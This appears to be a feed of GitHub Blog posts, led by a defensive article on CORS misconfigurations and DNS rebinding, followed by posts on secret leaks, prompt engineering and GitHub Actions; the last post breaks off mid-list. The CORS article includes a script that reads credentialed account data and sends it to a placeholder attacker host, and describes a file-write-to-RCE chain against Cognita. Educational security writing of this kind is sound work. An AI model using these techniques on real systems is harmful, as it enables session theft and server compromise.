Many developers change their CORS rules because users want to connect to third-party sites, such as payment or social media sites. However, developers often don't fully understand the dangers of changing the same-origin policy, and they use unnecessarily broad rules or faulty logic to prevent users from filing further issues.

In this blog post, we'll examine some case studies of how a broad or faulty CORS policy led to dangerous vulnerabilities in open source software. We'll also discuss DNS rebinding, an attack with similar effects to a CORS misconfiguration that's not as well known among developers.

What is CORS and how does it work?

CORS is a way to allow websites to communicate with each other directly by bypassing the same-origin policy, a security measure that restricts websites from making requests to a different domain than the one that served the web page. Understanding the Access-Control-Allow-Origin and Access-Control-Allow-Credentials response headers is crucial for correct and secure CORS implementation.

Access-Control-Allow-Origin is the list of origins that are allowed to make cross-site requests and read the response from the web server. If the Access-Control-Allow-Credentials header is set, the browser is also allowed to send credentials (cookies, HTTP authentication) if the origin requests it. Some requests are considered simple requests and do not need a CORS header in order to be sent cross-site. This includes GET, POST, and HEAD requests with content types restricted to application/x-www-form-urlencoded, multipart/form-data, and text/plain. When a third-party website needs access to account data from your website, adding a concise CORS policy is often one of the best ways to facilitate such communication.

To implement CORS, developers can either manually set the Access-Control-Allow-Origin header, or they can utilize a CORS framework, such as RSCors, that will do it for them. If you choose to use a framework, make sure to read the documentation – don't assume the framework is safe by default. For example, if you tell the CORS library you choose to reflect all origins, does it send back the response with a blanket pattern matching star (*) or a response with the actual domain name (e.g., stripe.com)?

Alternatively, you can create a custom function or middleware that checks the origin to see whether or not to send the Access-Control-Allow-Origin header. The problem is, you can make some security mistakes when rolling your own code that well-known libraries usually mitigate.

Common mistakes when implementing CORS

For example, when comparing the origin header with the allowed list of domains, developers may use the equivalents of the startsWith, exactMatch, and endsWith string comparison functions in their language of choice. The safest function is exactMatch, where the domain must match the allow list exactly. However, what if payment.stripe.com wants to make a request to our backend instead of stripe.com? To get around this, we'd have to add every subdomain to the allow list. This would inevitably cause user frustration when third-party websites change their APIs.

Alternatively, we can use the endsWith function. If we want connections from Stripe, let's just add stripe.com to the allowlist and use endsWith to validate and call it a day. Not so fast, since the domain attackerstripe.com is now also valid. We can tell the user to only add full URLs to the allowlist, such as https://stripe.com, but then we have the same problem as exactMatch.

We occasionally see developers using the startsWith function in order to validate domains. This also doesn't work. If the allowlist includes https://stripe.com, then we can just do https://stripe.com.attacker.com.

For any origin with subdomains, we must use .stripe.com (notice the extra period) in order to ensure that we are looking at a subdomain. If we combine exactMatch for second-level domains and endsWith for subdomains, we can make a secure validator for cross-site requests, as sketched below.
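
To make that concrete, here is a minimal TypeScript sketch of such a validator. The allowlists, the example.com entries, and the isAllowedOrigin helper are illustrative assumptions, not code taken from any of the projects discussed in this post.

// Apex origins are matched exactly; subdomains are matched with a suffix that
// starts with a dot, so lookalike domains cannot slip through.
const exactOrigins = new Set(["https://stripe.com", "https://example.com"]);
const allowedSuffixes = [".stripe.com", ".example.com"]; // note the leading dot

function isAllowedOrigin(origin: string): boolean {
  if (exactOrigins.has(origin)) return true; // exactMatch for second-level domains
  try {
    const url = new URL(origin);
    if (url.protocol !== "https:") return false;
    // endsWith against ".stripe.com" only: "https://attackerstripe.com" and
    // "https://stripe.com.attacker.com" both fail this check.
    return allowedSuffixes.some((suffix) => url.hostname.endsWith(suffix));
  } catch {
    return false; // malformed Origin headers and the literal "null" are rejected
  }
}

A handler would then echo the validated origin back in Access-Control-Allow-Origin (together with Vary: Origin) only when isAllowedOrigin returns true, and omit the header otherwise.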

Lastly, there's one edge case found in CORS: the null origin should never be added to allowed domains. The null origin can be hardcoded into the code or added by the user to the allowlist, and it's used when requests come from a file or from a privacy-sensitive context, such as a redirect. However, it can also come from a sandboxed iframe, which an attacker can include in their website. For more practice attacking a website with null origin, check out this CORS vulnerability with trusted null origin exercise in the PortSwigger Security Academy.

How can attackers exploit a CORS misconfiguration?

CORS issues allow an attacker to take actions on behalf of the user when a web application uses cookies (with SameSite=None) or HTTP basic authentication, since the browser must send those requests with the required authentication.
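
As a deliberately simplified sketch, the script below shows roughly what an attacker-controlled page could do if a vulnerable site reflects arbitrary origins with Access-Control-Allow-Credentials: true and the victim's browser still attaches its session cookie. The domains and endpoints (vulnerable.example, /api/account, attacker.example/collect) are placeholders, not real targets.

// Runs on the attacker's page while the victim is logged in to
// https://vulnerable.example, which reflects this page's Origin header.
async function stealAccountData(): Promise<void> {
  // credentials: "include" makes the browser attach the victim's cookies.
  const res = await fetch("https://vulnerable.example/api/account", {
    credentials: "include",
  });
  const accountData = await res.text();
  // Because the response allowed this origin with credentials, the script can
  // read it and exfiltrate it to the attacker's server.
  await fetch("https://attacker.example/collect", {
    method: "POST",
    body: accountData,
  });
}

void stealAccountData();

The same pattern works for state-changing requests, such as admin-only POST endpoints.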

Fortunately for users, Chrome now defaults cookies without a SameSite attribute to SameSite=Lax, which has made CORS misconfigurations useless in most scenarios. However, Firefox and Safari are still vulnerable to these issues via bypass techniques found by PTSecurity, whose research we highly recommend reading to understand how someone can exploit CORS issues.

What impact can a CORS misconfiguration have?

CORS issues can give a user the power of an administrator of a web application, so the usefulness depends on the application. In many cases, administrators have the ability to execute scripts or binaries on the server's host. These relaxed security restrictions allow attackers to get remote code execution (RCE) capabilities on the server host by convincing administrators to visit an attacker-owned website.

CORS issues can also be chained with other vulnerabilities to increase their impact. Since an attacker now has the permissions of an administrator, they are able to access a broader range of services and activities, making it more likely they'll find something vulnerable. Attackers often focus on vulnerabilities that affect the host system, such as arbitrary file write or RCE.

Real-world examples

A CORS misconfiguration allows for RCE

Cognita is a Python project that allows users to test the retrieval-augmented generation (RAG) ability of LLM models. If we look at how it used to call the FastAPI CORS middleware, we can see it used an unsafe default setting, with allow_origins set to all and allow_credentials set to true. Usually if the browser receives Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true, the browser knows not to send credentials with the origin, since the application did not reflect the actual domain, just a wildcard.

app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

However, FastAPI CORS middleware is unsafe by default and setting these two headers like this resulted in the origin being reflected along with credentials.

Currently, Cognita does not have authentication, but if its developers implemented authentication without fixing the CORS policy, their authentication could be bypassed. As it stands, any website can send arbitrary requests to any endpoint in Cognita, as long as they know how to access it. Due to its lack of authentication, Cognita appears intended to be hosted on intranets or locally. An attacking website can try guessing the local IP of a Cognita instance by sending requests to local addresses such as localhost, or it can enumerate the internal IP address space by continually making requests until it finds the Cognita instance. With this bug alone, our access is limited to just using the RAG endpoints and possibly deleting data. We want to get a foothold in the network. Let's look for a real primitive.

We found a simple arbitrary file write primitive: the developers added an endpoint for Docker users without sanitizing file names, so we can write to any file we want. The value of file.filename is controlled by the request, and os.path.join happily joins whatever it is given, so a filename containing ../ segments (or an absolute path) lets file_path escape the target folder entirely.

@router.post("/upload-to-local-directory")
async def upload_to_docker_directory(
    upload_name: str = Form(
        default_factory=lambda: str(uuid.uuid4()), regex=r"^[a-z][a-z0-9-]*$"
    ),
    files: List[UploadFile] = File(...),
):
...
        for file in files:
            logger.info(f"Copying file: {file.filename}, to folder: {folder_path}")
            file_path = os.path.join(folder_path, file.filename)
            with open(file_path, "wb") as f:
                f.write(file.file.read())
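
Before we keep pulling on this thread, it's worth noting how this kind of hole is usually closed. The sketch below is a generic hardening pattern, not Cognita's actual fix: strip any directory components from the client-supplied filename and verify that the final path still resolves inside the intended folder.

import os

def safe_join(folder_path: str, filename: str) -> str:
    # Drop any directory components the client sent ("../../etc/passwd" -> "passwd").
    basename = os.path.basename(filename)
    candidate = os.path.abspath(os.path.join(folder_path, basename))
    # Belt and braces: refuse anything that still escapes the upload folder.
    if not candidate.startswith(os.path.abspath(folder_path) + os.sep):
        raise ValueError("Invalid upload path")
    return candidate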

Now that we have an arbitrary file write primitive, what should we target to get RCE? This endpoint is meant for Docker users, and the Cognita documentation only shows how to install via Docker, so let's take a look at how the backend container is started.

command: -c "set -e; prisma db push --schema ./backend/database/schema.prisma && uvicorn --host 0.0.0.0 --port 8000 backend.server.app:app --reload"

Looking carefully, there's a --reload flag when starting up the backend server, which means we can overwrite any file on the server and uvicorn will automatically restart the application to apply our changes. Thanks, uvicorn! Let's target the __init__.py files that are imported on startup, and now we have RCE on the Cognita instance. We can use this to read data from Cognita, or use it as a starting point on the network and attempt to connect to other vulnerable devices from there.

Logic issues lead to credit card charges and backdoor access

Next, let's look at some additional real-life examples of faulty CORS logic.

We found the following code on the website https://tamagui.dev. Since the source code is available on GitHub, we decided to take a quick look. (Note: the vulnerability has since been reported by our team and fixed by the developer.)

export function setupCors(req: NextApiRequest, res: NextApiResponse) {
  const origin = req.headers.origin

  if (
    typeof origin === 'string' &&
    (origin.endsWith('tamagui.dev') ||
      origin.endsWith('localhost:1421') ||
      origin.endsWith('stripe.com'))
  ) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Access-Control-Allow-Credentials', 'true')
  }
}

As you can see, the developer added hardcoded origin checks. Taking a guess, the developer most likely used Stripe for payments, localhost for local development, and tamagui.dev for subdomain access or to deal with HTTPS issues. In short, it looks like the allowed domains were added as they became needed.

As we know, using endsWith like this is insufficient, and an attacker can register a domain that satisfies one of those checks, for example eviltamagui.dev, which ends with tamagui.dev. Depending on the permissions of the victim's tamagui.dev account, an attacker could perform a range of actions on their behalf, such as potentially buying products on the website and charging their credit card.

Lastly, some projects don't prioritize security, and developers simply write the code to work. For example, the following project used the HasPrefix and Contains functions to check the origin, which is easily exploitable. Using this vulnerability, we can trick an administrator into clicking a specific link (say, https://localhost.attacker.com, which passes the HasPrefix check) and use the user-add endpoint to install a backdoor account in the application.

func CorsFilter(ctx *context.Context) {
    origin := ctx.Input.Header(headerOrigin)
    originConf := conf.GetConfigString("origin")
    originHostname := getHostname(origin)
    host := removePort(ctx.Request.Host)

    if strings.HasPrefix(origin, "http://localhost") || strings.HasPrefix(origin, "https://localhost") || strings.HasPrefix(origin, "http://127.0.0.1") || strings.HasPrefix(origin, "http://casdoor-app") || strings.Contains(origin, ".chromiumapp.org") {
        setCorsHeaders(ctx, origin)
        return
    }

func setCorsHeaders(ctx *context.Context, origin string) {
    ctx.Output.Header(headerAllowOrigin, origin)
    ctx.Output.Header(headerAllowMethods, "POST, GET, OPTIONS, DELETE")
    ctx.Output.Header(headerAllowHeaders, "Content-Type, Authorization")
    ctx.Output.Header(headerAllowCredentials, "true")

    if ctx.Input.Method() == "OPTIONS" {
        ctx.ResponseWriter.WriteHeader(http.StatusOK)
    }
}
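
Both of these bugs, the endsWith checks and the HasPrefix/Contains checks, come from matching substrings of the raw origin instead of comparing it against an exact allowlist (or a carefully anchored hostname suffix). As a rough illustration, not a drop-in replacement for either project, a stricter check in Python might look like this (the allowed values are placeholders):

from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://tamagui.dev", "http://localhost:1421"}  # exact matches only
ALLOWED_SUFFIX = ".tamagui.dev"  # anchored with a leading dot, checked against the hostname

def is_trusted_origin(origin: str) -> bool:
    if origin in ALLOWED_ORIGINS:
        return True
    parts = urlsplit(origin)
    # Only trust subdomains when the scheme is https and the *hostname*
    # (not the raw origin string) ends with ".tamagui.dev".
    return (
        parts.scheme == "https"
        and parts.hostname is not None
        and parts.hostname.endswith(ALLOWED_SUFFIX)
    )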

DNS rebinding

Diagram showing how DNS rebinding utilizes the DNS system to exploit vulnerable web applications.

DNS rebinding achieves much the same result as a CORS misconfiguration, but its capabilities are more limited. DNS rebinding does not require a misconfiguration or bug on the part of the developer or user. Rather, it's an attack on how the DNS system works.

Both CORS and DNS rebinding vulnerabilities facilitate requests to API endpoints from unintended origins. First, an attacker lures the victim's browser to a domain that serves malicious JavaScript. That JavaScript keeps making requests to its own hostname, while the attacker, who controls the resolving DNS server for that domain and its subdomains, swaps the DNS records so the hostname now points at a local or internal IP address. Because the browser still treats these requests as same-origin, the script can scan for reachable services and send its malicious payload requests to whatever it finds.

This attack is very easy to set up using NCC Group's Singularity tool. Under its payloads folder, you can view the scripts that interact with Singularity, and even add your own script to tell it how to send requests and handle responses.

Fortunately, DNS rebinding is very easy to mitigate, because the rebound requests cannot carry the application's cookies, so adding simple authentication for all sensitive and critical endpoints will prevent this attack. Since the browser thinks it is contacting the attacker's domain, it sends any cookies set for that domain, not those belonging to the actual web application, and authorization fails.

If you don't want to add authentication to a simple application, then you should at least check that the Host header matches an approved host name or a local name. Unfortunately, many of the newly created AI projects proliferating right now have none of these protections built in, leaving any data on those web applications potentially retrievable and any vulnerability remotely exploitable.

public boolean isValidHost(String host) {

    // Allow loopback IPv4 and IPv6 addresses, as well as localhost
    if (LOOPBACK_PATTERN.matcher(host).find()) {
        return true;
    }

    // Strip port from hostname - for IPv6 addresses, if
    // they end with a bracket, then there is no port
    int index = host.lastIndexOf(':');
    if (index > 0 && !host.endsWith("]")) {
        host = host.substring(0, index);
    }

    // Strip brackets from IPv6 addresses
    if (host.startsWith("[") && host.endsWith("]")) {
        host = host.substring(1, host.length() - 1);
    }

    // Allow only if stripped hostname matches expected hostname
    return expectedHost.equalsIgnoreCase(host);
}

Because DNS rebinding is only exploitable under fairly specific conditions, security scanners tend not to flag it, for fear of generating too many false positives. At GitHub, our DNS rebinding reports to maintainers commonly go unfixed due to the unusual nature of this attack, and we see that only the most popular repositories have checks in place.

When publishing software that holds security critical information or takes privileged actions, we strongly encourage developers to write code that checks that the origin header matches the host or an allowlist.
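
As a rough illustration of that advice (FastAPI is used here only because it appears earlier in this post; the host and origin values are placeholders), a small middleware can reject requests whose Host or Origin header is not on an explicit allowlist:

from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse

app = FastAPI()

ALLOWED_HOSTS = {"localhost:8000", "127.0.0.1:8000"}  # hosts we expect to serve
ALLOWED_ORIGINS = {"http://localhost:8000"}           # origins allowed to call us

@app.middleware("http")
async def reject_unexpected_hosts(request: Request, call_next):
    host = request.headers.get("host", "")
    origin = request.headers.get("origin")
    # DNS rebinding leaves the attacker's hostname in the Host header,
    # so an exact allowlist check stops the rebound request cold.
    if host not in ALLOWED_HOSTS:
        return JSONResponse({"detail": "unexpected Host header"}, status_code=400)
    # Browser-initiated cross-origin requests also carry an Origin header we can verify.
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return JSONResponse({"detail": "origin not allowed"}, status_code=403)
    return await call_next(request)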

Conclusion

Using CORS to relax the same-origin policy has always been a source of common mistakes. Finding and fixing these issues is relatively simple once you understand CORS mechanics. New and improving browser protections have mitigated some of the risk and may eliminate this bug class altogether in the future. Oftentimes, finding CORS issues is as simple as searching the code for "CORS" or Access-Control-Allow-Origin to see whether any insecure presets or logic are used.

Check out the Mozilla Developer Network CORS page if you wish to become better acquainted with how CORS works and the configuration options available when using a CORS framework.

If youā€™re building an application without authentication that utilizes critical functionality, remember to check the Host header as an extra security measure.

Finally, GitHub Code Security can help you secure your project by detecting and suggesting a fix for bugs such as CORS misconfiguration!

The post Localhost dangers: CORS and DNS rebinding appeared first on The GitHub Blog.

April 1, 2025  20:41:44

If you know where to look, exposed secrets are easy to find. Secrets are supposed to prevent unauthorized access, but in the wrong hands, they can beā€”and typically areā€”exploited in seconds.

To give you an idea of the scope of the problem, more than 39 million secrets were leaked across GitHub in 2024 alone.1 Every minute GitHub blocks several secrets with push protection.2 Still, secret leaks remain one of the most commonā€”and preventableā€”causes of security incidents. As we develop code faster than ever previously imaginable, weā€™re leaking secrets faster than ever, too.

Thatā€™s why, at GitHub, weā€™re working to prevent breaches caused by leaked tokens, credentials, and other secretsā€”ensuring protection against secret exposures is built-in and accessible to every developer.

Today, weā€™re launching the next evolution of GitHub Advanced Security, aligning with our ongoing mission to keep your secretsā€¦secret.

  • Secret Protection and Code Security, now available as standalone products
  • Advanced Security for GitHub Team organizations
  • A free, organization-wide secret scan to help teams identify and reduce exposure.3

Hereā€™s how secrets leak, what weā€™re doing to stop it, and what you can do to protect your code. Letā€™s jump in.

How do secret leaks happen?

Most software today depends on secretsā€”credentials, API keys, tokensā€”that developers handle dozens of times a day. These secrets are often accidentally exposed. Less intuitively, a large number of breaches come from well-meaning developers who purposely expose a secret. Developers also often underestimate the risk of private exposures, committing, sharing, or storing these secrets in ways that feel convenient in the moment, but which introduce risk over time.

Unfortunately, these seemingly innocuous secret exposures are small threads to pull for an attacker looking to unravel a whole system. Bad actors are extremely skilled at using a foothold provided by ā€œlow riskā€ secrets for lateral movement to higher-value assets. Even without the risk of insider threats, persisting any secret in git history (or elsewhere) makes us vulnerable to future mistakes. Research shows that accidental mistakes (like inadvertently making a repository public) were higher in 2024 than ever before.

If youā€™re interested in learning more about secret leaks and how to protect yourself, check out this great video from my colleague Chris Reddington:

What is GitHub doing about it?

We care deeply about protecting the developer community from the risk of exposed secrets. A few years ago, we formally launched our industry partnership program, which has now grown to hundreds of token issuers like AWS, Google Cloud Platform, Meta, and OpenAIā€”all fully committed to protecting the developer community from leaked secrets.

Last year, we rolled out push protection by default for public repositories, which has since blocked millions of secrets for the open source community.

And finally, as of today, weā€™re rolling out additional changes to our feature availability, aligning with our ongoing goal to help organizations of all sizes protect themselves from the risk of exposed secrets: a new point-in-time scan, free for organizations; a new pricing plan, to make our paid security tooling more affordable; and the release of Secret Protection and Code Security to GitHub Team plans.

What you can do to protect yourself from exposed secrets

GitHub push protection helps prevent secret leaks before they happen.

The easiest way to protect yourself from leaked secrets is not to have any in the first place. Push protection, our built-in solution, is the simplest way to block secrets from accidental exposure. It leverages the same detectors that we created through our partnership program with cloud providers, ensuring secrets are caught quickly and accurately with the lowest rate of false positives possible.

Studies have shown that GitHub Secret Protection is the only secret scanning tool, proprietary or open source, that can claim a better-than-one-in-two true positive rate across all findings.4 GitHub received a precision score of 75% (compared to the next best at 46% precision). Compared to alternatives like open source scanning solutions, it's not that GitHub is finding fewer secrets... it's that we're finding real ones. That way, you're able to spend less time worrying about false positives, and more time on what matters: shipping.

Long-lived credentials are some of the most common and dangerous types of secrets to leak, as they often persist unnoticed for monthsā€“or yearsā€“and give bad actors extended access. Thatā€™s why managing secrets through their full lifecycle is critical.

Beyond push protection, you can protect yourself from leaks by following security best practices to ensure secrets are securely managed from creation to revocation:

  • Creation: follow the principle of least privilege and make sure secrets are securely generated.
  • Rotation: outside of user credentials, secrets should be regularly rotated.
  • Revocation: restrict access when no longer neededā€“or when compromised.

Throughout the lifecycle of a secret, you should eliminate human interaction and automate secret management whenever possible.

In addition, you should adopt a continuous monitoring solution for detecting exposures, so you can react quickly. Like push protection, GitHubā€™s built-in solution for secret scanning is the simplest way to triage previously leaked secrets.

Starting today, investing in GitHubā€™s built-in security tooling is more affordable and in reach for many teams with the release of GitHub Secret Protection (free for public repositories), in addition to a new point-in-time scan (free for all organization repositories), which can be run periodically to check for exposed secrets.

Learn more about deploying and managing secret protection at scale:

GitHub Secret Protection and GitHub Code Security

Introducing GitHub Secret Protection and GitHub Code Security

As of today, our security products are available to purchase as standalone products for enterprises, enabling development teams to scale security quickly. Previously, investing in secret scanning and push protection required purchasing a larger suite of security tools, which made fully investing unaffordable for many organizations. This change puts scalable security with Secret Protection and Code Security within reach of many more organizations.

GitHub Secret Protection is here for GitHub Team organizations to purchase

In addition, as of today, our standalone security products are also available as add-ons for GitHub Team organizations. Previously, smaller development teams were unable to purchase our security features without upgrading to GitHub Enterprise. This change ensures our security products remain affordable, accessible, and easy to deploy for organizations of all sizes.

Have your secrets been exposed? Try our new public preview

The secret risk assessment is available for GitHub organizations

Understanding whether you have existing exposed secrets is a critical step. Starting today, you can run a secret risk assessment for your organization.

The secret risk assessment is a point-in-time scan leveraging our scanning engine for organizations, covering all repositoriesā€“public, private, internal, and even archivedā€“and can be run without purchase. The point-in-time scan provides clear insights into the exposure of your secrets across your organization, along with actionable steps to strengthen your security and protect your code. In order to lower barriers for organizations to use and benefit from the feature, no specific secrets are stored or shared.

The public preview is releasing today for organizations across GitHub Team and Enterprise plans to try. Itā€™s still quite early, so weā€™d love to hear your feedback, like whether additional guidance on next steps would be helpful, or whether this is something youā€™d leverage outside of Team and Enterprise plans.

If you have feedback or questions, please do join the discussion in GitHub Communityā€“weā€™re listening.

 

Learn more about GitHub Advanced Security, including Secret Protection and Code Security.

Notes


  1. State of the Octoverse, 2024 ā†©
  2. Push protection helps prevent secret leaksā€“without compromising the developer experienceā€“by scanning for secrets before they are pushed. Learn more about push protectionā†©
  3. The secret risk assessment is a free tool which will provide clear insights into secret exposure across your organization, along with actionable steps to strengthen their security and protect their code. Learn more about the secret risk assessmentā†©
  4. A Comparative Study of Software Secrets Reporting by Secret Detection Tools, Setu Kumar Basak et al., North Carolina State University, 2023 ā†©

The post GitHub found 39M secret leaks in 2024. Hereā€™s what weā€™re doing to help appeared first on The GitHub Blog.

March 31, 2025  13:00:32

Welcome back to season two of GitHub for Beginners, a series designed to help you navigate GitHub more confidently! So far, weā€™ve explored how to use GitHub Copilot and some of its essential features. Today, we will be learning all about large language models (LLMs) and the basics of prompt engineering.

LLMs are powerful, and the way we interact with them via prompts matters. For example, have you ever tried asking an LLM a question, but it canā€™t really figure out what youā€™re trying to ask? Understanding the power of prompts (and the limitations that come with them) can help you become even more productive.

In this post, weā€™ll explore:

  • How LLMs work and how prompts are processed.
  • How to engineer the most effective prompts.
  • How to troubleshoot prompts when we donā€™t get the outcomes we want.

Letā€™s get started!

Whatā€™s an LLM?

Large language models are a type of AI that are trained on a large (hence the name) amount of text data to understand and generate human-like language.

By predicting the next word in a sentence based on the context of the words that came before it, LLMs respond to humans in a way that is relevant and coherent. Sort of like an ultra-smart autocomplete!

This image shows the process of using an LLM: entering prompt text, LLM analysis, and then receiving a response.

When it comes to using LLMs, there are three important things to understand:

  • Context: This is the surrounding information that helps an LLM understand what youā€™re talking about. Just like when you have a conversation with a friend, the more context you offer, the more likely the conversation will make sense.

This image shows a visual example of what itā€™s like to gain context within a text message thread between two friends, and then a flow chart showing how the conversation went from no context at all to achieving full context.

  • Tokens: For LLMs, text is broken down into units called tokens. A token could be a word, part of a word, or even just a single letter. AI models process tokens to generate responses, so the number of tokens you use with an LLM can impact its response. Too few tokens can lead to a lack of context, but too many could overwhelm the AI model or run into its built-in token limits. (See the short tokenizer sketch after this list for a concrete example.)

This image is a visual representation of how a rare word like ā€œSupercalifragilisticexpialidociousā€ would be broken down into six smaller, more common tokens, or subword pieces.

  • Limitations: LLMs are powerful, but not all-powerful. Instead of understanding language like humans, LLMs rely on patterns and probabilities from training data. Taking a deeper dive into training data is beyond the scope of this post, but as a general rule, the ideal data set is diverse and broad. Models are never perfectā€”sometimes they can hallucinate, provide incorrect answers, or give nonsensical responses.

This image depicts how common sense reasoning plays into prompting LLMs. It explores a prompt, shares how humans and LLMs would each understand the prompt, and shares a potential hallucination.
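
If you want to see tokenization for yourself, as mentioned in the Tokens item above, the open source tiktoken library offers one way to peek at how a string breaks apart. It's just an example tokenizer; other models split text differently and will give different counts:

import tiktoken

# cl100k_base is one common encoding; the exact token count varies by model.
enc = tiktoken.get_encoding("cl100k_base")

tokens = enc.encode("Supercalifragilisticexpialidocious")
print(len(tokens))                        # how many tokens the word costs
print([enc.decode([t]) for t in tokens])  # the subword pieces themselves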

What is a prompt?

A prompt is a natural language request that asks an LLM to perform a specific task or action. A prompt gives the model context via tokens, and works around the modelā€™s potential limitations, so that the model can give you a response. For example, if you prompt an LLM with ā€œWrite a JavaScript function to calculate the factorial of a number,ā€ it will use its training data to give you a function that accomplishes that task.

This image shares four steps in which an LLM might process your prompt. The four steps are: input prompt, tokenization, processing, and response generation.

Depending on how a specific model was trained, it might process your prompt differently and present different code. Even the same model can produce different outputs: these models are nondeterministic, which means you can give one the same prompt three times and get three different results. This is why you may receive different outputs from the various models out in the world, like OpenAI's GPT, Anthropic's Claude, and Google's Gemini.

Now that we know what a prompt is, how do we use prompts to get the outputs we want?

What is prompt engineering?

Imagine that a friend is helping you complete a task. Itā€™s important to give them clear and concise instructions if thereā€™s a specific way the task needs to be done. The same is true for LLMs: a well-crafted prompt can help the model understand and deliver exactly what youā€™re looking for. The act of crafting these prompts is prompt engineering.

Thatā€™s why crafting the right prompt is so important: when this is done well, prompt engineering can drastically improve the quality and relevance of the outputs you get from an LLM.

Here are a few key components of effective prompting:

  • An effective prompt is clear and precise, because ambiguity can confuse the model.
  • Itā€™s also important to provide enough context, but not too much detail, since this can overwhelm the LLM.
  • If you donā€™t get the answer youā€™re expecting, donā€™t forget to iterate and refine your prompts!

Letā€™s try it out!

Example: How to refine prompts to be more effective

Imagine you're using GitHub Copilot in a new file, with no prior code to offer Copilot context, and you say: Write a function that will square numbers in a list. At first, this seems like a straightforward and effective prompt. But there are a lot of factors that aren't clear:

  • What language should the function be written in?
  • Do you want to include negative numbers?
  • Will the input ever have non-numbers?
  • Should it affect the given list or return a new list?

How could we refine this prompt to be more effective? Letā€™s change it to: Write a Python function that takes a list of integers and returns a new list where each number is squared, excluding any negative numbers.

This new prompt is clear and specific about what language we want to use, what the function should do, what constraints there are, and the expected input type. When we give GitHub Copilot more context, the output will be better aligned with what we want from it!
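
With a prompt that specific, Copilot's suggestion will usually land close to something like the function below. Your exact output will differ, since models are nondeterministic; this is just one plausible result:

def square_non_negative(numbers: list[int]) -> list[int]:
    """Return a new list with each non-negative integer squared.

    Negative numbers are excluded rather than squared, matching the prompt.
    """
    return [n * n for n in numbers if n >= 0]


print(square_non_negative([3, -1, 0, 5]))  # [9, 0, 25]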

This image consists of white text on a black background sharing that prompt engineering is the same thing as being a good communicator.

Just like coding, prompt engineering is about effective communication. By crafting your prompts thoughtfully, you can more effectively use tools like GitHub Copilot to make your workflows smoother and more efficient. That being said, working with LLMs means there will still be some instances that call for a bit of troubleshooting.

How to improve results when prompting LLMs

As you continue working with GitHub Copilot and other LLM tools, you may occasionally not get the output you want. Oftentimes, itā€™s because your initial prompt wasnā€™t specific enough. Here are a few scenarios you might run into when prompting LLMs.

Prompt confusion

Itā€™s easy to mix multiple requests or be unclear when writing prompts, which can confuse the model youā€™re using. Say you highlight something in Visual Studio Code and tell Copilot fix the errors in this code and optimize it. Is the AI supposed to fix the errors or optimize it first? For that matter, what is it supposed to optimize for? Speed, memory, or readability?

This image depicts how to overcome prompt confusion, or mixing multiple requests or unclear instructions. First, youā€™d fix errors, then optimize code, and finally add tests.

To solve this, you need to break your prompt down into concrete steps with context. We can adjust this prompt by separating our asks: First, fix the errors in the code snippet. Then, optimize the fixed code for better performance. Building a prompt iteratively makes it more likely that youā€™ll get the result you want because the specific steps the model needs to take are more clear.

Token limitations

Remember, tokens are units of words or partial words that a model can handle. But thereā€™s a limit to how many tokens a given model can handle at once (this varies by model, tooā€”and there are different models available with GitHub Copilot). If your prompt is too long or the expected output is very extensive, the LLM may hallucinate, give a partial response, or just fail entirely.

This image depicts how to overcome token limitations, since LLMs have a maximum token limit for input and output. You would need to break down large inputs into smaller chunks.

That means you want to keep your prompts concise. Again, itā€™s important to iterate on smaller sections of your prompt, but itā€™s also crucial to only provide necessary context. Does the LLM actually need an entire code file to return your desired output, or would just a few lines of code in a certain function do the trick? Instead of asking it to generate an entire application, can you ask it to make each component step-by-step?
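
As a rough sketch of what breaking a large input into smaller chunks can look like in practice, again using tiktoken purely as an illustrative tokenizer and a made-up token budget:

import tiktoken

enc = tiktoken.get_encoding("cl100k_base")

def chunk_by_tokens(text: str, max_tokens: int = 500) -> list[str]:
    """Split text into pieces that each fit within a token budget."""
    tokens = enc.encode(text)
    return [
        enc.decode(tokens[i:i + max_tokens])
        for i in range(0, len(tokens), max_tokens)
    ]

# Each chunk can then go into its own prompt, along with a short summary of
# the chunks that came before it to preserve context.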

Assumption errors

Itā€™s easy to assume that the LLM knows more than it actually does. If you say add authentication to my app, does the model know what your app does? Does it know which technologies you may want to use for authentication?

This image depicts how to overcome assumption errors, or when you assume LLM has context it doesnā€™t have. Youā€™d need to explicitly state requirements, outline specific needs, mention best practices if needed, and then iterate with edge cases and restraints.

When crafting a prompt like this, you'll need to explicitly state your requirements. This can be done by outlining specific needs, mentioning best practices if you have any, and, once again, iterating with edge cases and constraints. By stating your requirements, you'll help ensure the LLM doesn't overlook critical aspects of your request when it generates the output.

Prompt engineering best practices

Prompt engineering can be tricky to get the hang of, but youā€™ll get better the more you do it. Here are some best practices to remember when working with GitHub Copilot or any other LLM:

  • Give the model enough context while considering any limitations it might have.
  • Prompts should be clear, concise, and precise for the best results.
  • If you need multiple tasks completed, break down your prompts into smaller chunks and iterate from there.
  • Be specific about your requirements and needs, so that the model accurately understands the constraints surrounding your prompt.

Your next steps

We covered quite a bit when it comes to prompt engineering. We went over what LLMs are and why context is important, defined prompt engineering and crafting effective prompts, and learned how to avoid common pitfalls when working with large language models.

  • If you want to watch this demo in action, weā€™ve created a YouTube tutorial that accompanies this blog.
  • If you have any questions, pop them in the GitHub Community thread and weā€™ll be sure to respond.
  • Remember to sign up for GitHub Copilot (if you havenā€™t already) to get started for free.
  • Join us for the next part of the series where weā€™ll walk through security best practices.

Happy coding!

Looking to learn more about GitHub Copilot?
Try GitHub Copilot for free or read more about Copilot.

The post GitHub for Beginners: How to get LLMs to do what you want appeared first on The GitHub Blog.

March 27, 2025  16:00:46

Maintaining and contributing to open source projects can be rewardingā€”but it comes with a lot of small, repetitive tasks. The good news? GitHub Actions can automate the more tedious and error-prone parts of maintainership, freeing you up to focus on what matters: building and growing your community. Whether youā€™ve just launched your project or youā€™re looking to scale, here are a few of the most helpful actions to help you along your way.

Pro tip: Itā€™s best practice to audit the source code of any action you use, and pin actions to a full length commit SHA so that you always know what version of the code youā€™re using.

Now, letā€™s get started.

1. Clean up your backlog with stale

Managing issues or pull requests can be challenging, especially when users open issues that require additional information to resolve. If they donā€™t respond with what you need, these issues can pile up and make your backlog look daunting. Stale closes any issues or pull requests that lack activity after a set number of days, keeping your open issues list nice and tidy.

šŸ‘‰ Who uses it: DeepSeek-R1, opentelemetry-go, and more.

